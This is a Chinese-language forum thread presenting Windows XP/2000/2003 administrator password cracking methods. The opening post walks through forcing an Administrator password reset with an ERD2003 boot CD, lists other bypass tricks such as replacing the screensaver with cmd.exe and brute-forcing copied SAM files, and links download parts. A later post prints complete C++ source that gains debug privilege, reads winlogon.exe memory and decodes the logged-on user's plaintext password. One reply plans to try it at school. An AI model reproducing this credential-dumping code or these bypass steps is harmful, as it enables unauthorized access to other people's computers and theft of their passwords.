史萊姆論壇
第1頁,共2頁 1 2 >
在一頁顯示本主題中的 40 個文章

史萊姆論壇 (http://forum.slime.com.tw/)
-   作業系統操作技術文件 (http://forum.slime.com.tw/f128.html)
-   -   最強破解 XP,2000,2003 登入密碼的方法 (http://forum.slime.com.tw/thread164572.html)

mini 2005-12-29 04:02 PM
最強破解 XP,2000,2003 登入密碼的方法
 
最強破解 XP,2000,2003 登入密碼的方法!(破解 超級管理員 密碼)

資料來源:
http://www.rus.net.tw/
http://hs.rus.net.tw/

經常見到有人遺忘了系統的管理員密碼來求助的,而網上針對此類的答案可謂五花八門,但經實踐發現其中絕大多數都是沒有用的,有些以訛傳訛的方法(例如在winxp系統下刪除sam檔等等)還會造成系統的徹底崩潰。

相比之下,利用 ERD2003 強行修改系統管理員密碼的方法簡單、易於操作,且對 2000/xp/2003 系統均有效。下面就具體介紹一下這個軟體的用法。


1. 當然是下載 ERD2003,解壓後,將其印象檔燒成光碟。
2. 光碟啟動,進入介面
3. 進入“系統”後,ERD2003會針對系統的網路等硬體設備進行一些設置,總之遇到要你選擇時一概選 yes 即可
4. 在網卡的配置時,系統提示說沒有經過 xp 的認證,不管它,一概選 yes
5. 接下來 ERD2003 會在你的硬碟媟j索所有已安裝的系統,再讓你選擇要修改的系統,這塈睊嚝 win2003 進行修改。按確定!
6. 正式進入 ERD2003 桌面了
7. 接下來是最關鍵的一步:按開始-修改密碼(或英文 start—administrative tools—locksmith),進入強行修改密碼的介面,隨後彈出的對話方塊會讓你選擇要修改密碼的用戶名(一般是選擇超級管理員 Administrator),選擇後即可強行修改密碼而不用輸入原始密碼,然後點擊 NEXT
8. 完成了,點擊 finish 之後就重啟吧,然後試試你修改的密碼,是不是進去了?原來 xp/2003 貌似嚴密的密碼保護也不過如此而已啊,一張小小的 erd2003 光碟就全破解了……


PS:網上其他一些傳說中破解 2000/xp/2003 密碼的方法如下:
1. 刪除 sam 檔——這種方法對 win2000 有效,對 xp 和 2003 不但無效,還會導致系統鎖死而徹底無法使用。
2. 用 winpe 啟動進控制臺,然後用 dos 命令手動增添用戶——除非原來管理員密碼就沒有設置,否則無效。
3. 將螢幕保護改名,將 cmd.exe 改名為 logon.scr (當然要掛在別的機器上改了),開機後等待 10 分鐘進入螢幕保護,實際上就進入了 dos 命令行介面,可以用 net 命令加用戶——已證明在 sp1、sp2、2003 中,這樣進入 dos 後的許可權根本不是管理員,因此也無法添加用戶。
4. 硬碟掛到別的機器上,copy 出 sam 文件,用 lc4 暴力解密——理論上是可以的,但如果密碼比較複雜的話,解密時間會 bt 的長。
5. 用 Windows Key 軟碟啟動系統,可直接修改管理員密碼——可是,我在網上根本找不到任何這個軟體的註冊碼或者註冊機,那樣是根本無法真正使用這個軟體的。
6. 2004年第14期的《大眾軟體》上介紹了一個新的螢幕保護程式破解法,但是根據我的試驗也是無法真正破解密碼的


「ERD2003」LiveCD下載點:(*2005/10/3 更新)
http://rapidshare.de/files/5812782/W...part1.rar.html
http://rapidshare.de/files/5813301/W...part2.rar.html
http://rapidshare.de/files/5813313/W...part3.rar.html
三個檔案都下載回來後放同一個資料夾,再用WinRAR解壓縮即可
(From 密技偷偷報 http://totalpost.pcuser.com.tw/2AT124.htm)


論壇相關帖:
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003
http://www.slime2.com.tw/forums/show...hlight=ERD2003

san 2006-01-05 06:53 PM
:face8: 嗯 恩恩!  :deftgh65:  虎利害

crd1871 2006-01-06 05:40 PM
蠻實用的,感謝分享~~

lupin1123 2006-01-07 11:48 PM
有大大下載下來了嗎?
可以分享一下嗎?因為我要等1個小時才能繼續下載第2個檔案!
支援RS的小軟體都試過了!還是無法順利下載(2跟3)=.=

六翼黑帝斯 2006-01-15 10:34 AM
超強~
這招先學著
以後在學校玩玩看!!@@...

180524 2006-01-15 11:22 AM
引用:
作者: lupin1123
有大大下載下來了嗎?
可以分享一下嗎?因為我要等1個小時才能繼續下載第2個檔案!
支援RS的小軟體都試過了!還是無法順利下載(2跟3)=.=
我也是耶!
我用了RapidShare Ling Grab Helper
也是要等1小時才行
有哪位大大能解決嗎?

fang310 2006-04-28 07:50 PM
引用:
作者: mini
最強破解 XP,2000,2003 登入密碼的方法!(破解 超級管理員 密碼)

資料來源:
http://www.rus.net.tw/
http://hs.rus.net.tw/

經常見到有人遺忘了系統的管理員密碼來求助的,而網上針對此類...
真是太感謝了....超好用的啦....

psac 2006-09-23 01:56 PM
教你如何獲取windows2000當前用戶的密碼

本文所用的代碼原創作者已不知.是ccrun的一個朋友磨刀老頭提供給的,在此對作者表示感謝.經ccrun(老妖)在Win2k下試驗成功.

// 獲取WinNT/Win2k當前用戶名和密碼,呼叫以下函數即可:
// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
}QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
}PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
}PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
}ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);

// Private Prototypes
BOOL IsWinNT(void);
BOOL IsWin2K(void);
BOOL AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);
bool GetPassword(String &, String &, String &);

// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

DWORD dwPwdLen = 0;
PVOID pvRealPwd = NULL;
PVOID pvPwd = NULL;
DWORD dwHashByte = 0;
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];
//---------------------------------------------------------------------------
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
if(!IsWinNT() && !IsWin2K())
{
// 只適合於2000或者xp
return false;
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if(!AddDebugPrivilege())
{
// 不能夠新增debug特權
return false;
}
// debug特權已經成功加入到本程式
HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD dwWinLogonPID = FindWinLogon ();
if(!dwWinLogonPID)
{
// 找不到工作行程WinLogon 或者正在使用 NWGINA.DLL
// 導致不能在記憶體中找到密碼
FreeLibrary(hNtDll);
return false;
}
// Format("主工作行程WinLogon的id是 %d (0x%8.8x).\n",
// ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
// Set values to check memory block against.
memset(wszUserName, 0, sizeof (wszUserName));
memset(wszUserDomain, 0, sizeof (wszUserDomain));
GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);

// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL bFoundPasswordPage;
//bFoundPasswordPage = FALSE;
if(IsWin2K())
bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
else
bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
if(bFoundPasswordPage)
{
if(dwPwdLen == 0)
{
// Format("登入訊息為: 域名:%S/密碼:%S.\n",
// ARRAYOFCONST((wszUserDomain, wszUserName))));
// 密碼長度為空,系統沒有密碼
}
else
{
// Format("找到了密碼,長度為%d\n", ARRAYOFCONST(((int)dwPwdLen))));
// Decode the password string.
if(IsWin2K())
ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
else
ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
}
}
else
{
FreeLibrary(hNtDll);
return false;
}// 沒有在記憶體中間找到密碼
return true;
}
//---------------------------------------------------------------------------
BOOL IsWinNT(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if(GetVersionEx(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL IsWin2K(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&& (OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL AddDebugPrivilege(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength));
}
return (FALSE);
}
//---------------------------------------------------------------------------
// 本文是ccrun(老妖)的一個朋友提供的代碼.有問題或建議請致信:info@ccrun.com
// 歡迎光臨C++ Builder 研究 http://www.ccrun.com
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD dwRc = 0;
DWORD dwSizeNeeded = 0;
PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
HeapFree(GetProcessHeap(), 0, pvInfo);
// Now, allocate the proper amount of memory.
pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
DWORD dwSizeWritten = dwSizeNeeded;
if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if(dwNumHandles == 0)
{
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) pvInfo;
try
{
for(DWORD i=1; i<=dwNumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
if(pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
{
PPROCESS_INFO_HEADER pihProcessInfoHeader =
(PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60);
DWORD dwCount = pihProcessInfoHeader->Count;
PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
((DWORD)pihProcessInfoHeader + sizeof (PROCESS_INFO_HEADER));
// Form1->Memo1->Lines->Add(piProcessInfo->Name);
AnsiString strName = piProcessInfo->Name;
// if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0)
if(strName.UpperCase().Pos("WINLOGON") != 0)
{
DWORD dwTemp = (DWORD)piProcessInfo;
for (DWORD j=0; j<dwCount; j++)
{
dwTemp += sizeof (PROCESS_INFO);
piProcessInfo = (PPROCESS_INFO)dwTemp;
strName = piProcessInfo->Name;
if(strName.UpperCase().Pos("NWGINA") !=0 )
return (0);
if(strName.UpperCase().Pos("MSGINA") !=0 )
dwRc =QuerySystemInformationP->PID;
}
if(pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
}
if (pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
}
DWORD dwTemp = (DWORD)QuerySystemInformationP;
dwTemp += sizeof(QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp;
}
}
catch(...)
{}
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WINNT 0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
BOOL bRc = FALSE;
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, dwWinLogonPID);
if(!hWinLogonHandle)
return (bRc);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD dwPEB = 0x7ffdf000;
DWORD dwBytesCopied = 0;
PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP,
siSystemInfo.dwPageSize, &dwBytesCopied))
{
CloseHandle(hWinLogonHandle);
return (bRc);
}
// Grab the value of the 2nd DWORD in the TEB.
PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP + (6 * sizeof (DWORD)));
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
if(VirtualQueryEx(hWinLogonHandle, (PVOID) *pdwWinLogonHeap,
&mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION)))
if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
mbiMemoryBasicInfor.RegionSize);
if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap,
pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
DWORD i = (DWORD)pvWinLogonMem;
DWORD dwUserNamePos = 0;
// The order in memory is wszUserName followed by the wszUserDomain.
do
{
if((wcscmp(wszUserName, (wchar_t *)i) == 0) &&
(wcscmp(wszUserDomain, (wchar_t *)
(i + USER_DOMAIN_OFFSET_WINNT)) == 0))
{
dwUserNamePos = i;
break;
}
i += 2;
}while(i < (DWORD)pvWinLogonMem + mbiMemoryBasicInfor.RegionSize);
if(dwUserNamePos)
{
PENCODED_PASSWORD_INFO pepiEncodedPwdInfo =
(PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos +
USER_PASSWORD_OFFSET_WINNT);
FILETIME ftLocalFileTime;
SYSTEMTIME stSystemTime;
if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn,
&ftLocalFileTime))
if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime))
{}
// Format("你的登入時間為: %d/%d/%d %d:%d:%d\n",
// ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay,
// stSystemTime.wYear, stSystemTime.wHour,
// stSystemTime.wMinute, stSystemTime.wSecond))));
*pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0x00ff) / sizeof (wchar_t);
dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0xff00) >> 8;
pvRealPwd = (PVOID)(*pdwWinLogonHeap + (dwUserNamePos -
(DWORD)pvWinLogonMem) + USER_PASSWORD_OFFSET_WINNT + 0x34);
pvPwd = (PVOID)((PBYTE)(dwUserNamePos +
USER_PASSWORD_OFFSET_WINNT + 0x34));
bRc = TRUE;
}
}
}
HeapFree(GetProcessHeap(), 0, pvEBP);
CloseHandle(hWinLogonHandle);
return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, dwWinLogonPID);
if(hWinLogonHandle == 0)
return (FALSE);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress;
DWORD dwIncrement = siSystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
while(i < dwMaxMemory)
{
if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor,
sizeof (MEMORY_BASIC_INFORMATION)))
{
dwIncrement = mbiMemoryBasicInfor.RegionSize;
if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize);
DWORD dwBytesCopied = 0;
if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress,
mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0)
&& (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress +
USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0))
{
pvRealPwd = (PVOID)(i + USER_PASSWORD_OFFSET_WIN2K);
pvPwd = (PVOID)((DWORD)pvRealStartingAddress +
USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE pbTemp = (PBYTE)pvPwd;
DWORD dwLoc = (DWORD)pbTemp;
DWORD dwLen = 0;
if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp + 1) == 0))
{}
else
do
{
dwLen++;
dwLoc += 2;
pbTemp = (PBYTE) dwLoc;
}while(*pbTemp != 0);
*pdwPwdLen = dwLen;
CloseHandle(hWinLogonHandle);
return (TRUE);
}
}
HeapFree(GetProcessHeap(), 0, pvRealStartingAddress);
}
}
else
dwIncrement = siSystemInfo.dwPageSize;
// Move to next memory block.
i += dwIncrement;
}
CloseHandle(hWinLogonHandle);
return (FALSE);
}
//---------------------------------------------------------------------------
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
UNICODE_STRING usEncodedString;
usEncodedString.Length = (WORD)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((WORD)dwPwdLen * sizeof (wchar_t)) + sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t));
// Finally - decode the password.
// Note that only one call is required since the hash-byte
// was part of the orginally encoded string.
pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString);
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = AnsiString(usEncodedString.Buffer);
// Format("你的登入訊息是 域名:%S 用戶名:%S 密碼:%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte))));
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
// DWORD dwHash = 0;
UNICODE_STRING usEncodedString;
usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((USHORT)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
// This is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for(DWORD i=0; i<=0xff; i++)
{
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof (wchar_t));
// Finally - try to decode the password.
pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString);
// Check for a viewable password.
PBYTE pbTemp = (PBYTE)usEncodedString.Buffer;
BOOL bViewable = TRUE;
DWORD j, k;
for(j=0; (j<dwPwdLen) && bViewable; j++)
{
if((*pbTemp) && (*(PBYTE)(DWORD(pbTemp) + 1) == 0))
{
if(*pbTemp < 0x20)
bViewable = FALSE;
if(*pbTemp > 0x7e)
bViewable = FALSE;
}
else
bViewable = FALSE;
k = DWORD(pbTemp);
k += 2;
pbTemp = (PBYTE)k;
}
if(bViewable)
{
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = String(usEncodedString.Buffer);
// Format("你的登入訊息為: 域名:%S 用戶名:%S 密碼:%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i))));
}
}
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
// 呼叫舉例
void __fastcall TForm1::Button1Click(TObject *Sender)
{
String strCurrDomain, strCurrUser, strCurrPwd;
GetPassword(strCurrDomain, strCurrUser, strCurrPwd);
Memo1->Lines->Add(strCurrDomain);
Memo1->Lines->Add(strCurrUser);
Memo1->Lines->Add(strCurrPwd);

koma 2006-10-07 06:31 PM
謝謝分享 支持一下

p933272349 2006-10-11 05:42 PM
恩好厲害..非常感謝

lew 2006-10-12 04:57 PM
哇~~好厲害喔~!

乃乃 2006-10-23 01:42 AM
沒想到還能DL,謝謝大大無私分享^^

Opisai 2006-10-23 10:11 AM
引用:
作者: mini
最強破解 XP,2000,2003 登入密碼的方法!(破解 超級管理員 密碼)

5. 用 Windows Key 軟碟啟動系統,可直接修改管理員密碼——可是,我在網上根本找不到任何這個軟體的註冊碼或者註冊機,那樣是根本無法真正使用這個軟體的。
我記得好像在史版下過 Windows Key ..是開機光碟,用它開機後就可以直接把密碼
改掉.. 很快。試過五..六次.. 都有用..

藍色協奏曲 2006-10-23 06:21 PM
絕對有用,以win2000和winxp都是破解成功的!
在對win2x server中(大型serveru,也就是有raid,請先把raid卡驅動程式裝上)然後在用erd開機!

tone20130 2006-10-24 08:27 PM
:n4: 刀射啦!!!!


所有時間均為台北時間。現在的時間是 03:52 AM
第1頁,共2頁 1 2 >
在一頁顯示本主題中的 40 個文章

Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.

『服務條款』

* 有問題不知道該怎麼解決嗎?請聯絡本站的系統管理員 *


SEO by vBSEO 3.6.1